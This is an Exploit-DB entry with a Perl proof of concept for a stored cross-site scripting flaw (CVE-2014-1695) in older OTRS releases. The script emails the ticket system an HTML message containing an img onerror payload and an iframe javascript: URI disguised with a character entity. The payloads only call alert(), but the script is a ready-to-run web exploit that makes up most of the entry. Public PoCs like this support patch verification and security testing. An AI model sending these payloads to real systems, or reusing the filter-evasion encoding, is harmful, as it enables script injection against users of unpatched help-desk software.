Lucene search

K
exploitdbAdam ZiajaEDB-ID:36842
HistoryApr 27, 2015 - 12:00 a.m.

OTRS < 3.1.x / < 3.2.x / < 3.3.x - Persistent Cross-Site Scripting

2015-04-2700:00:00
Adam Ziaja
www.exploit-db.com
32

8.7 High

AI Score

Confidence

High

0.043 Low

EPSS

Percentile

92.3%

# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695

#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
    Subject => 'OTRS XSS PoC',
    From => '[email protected]',
    To => '[email protected]',
    Type => 'text/html',
    Data =>
        '<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
src=javasc&#x72ipt:alert(\'XSS2\') ></body></html>'
);
$msg->send();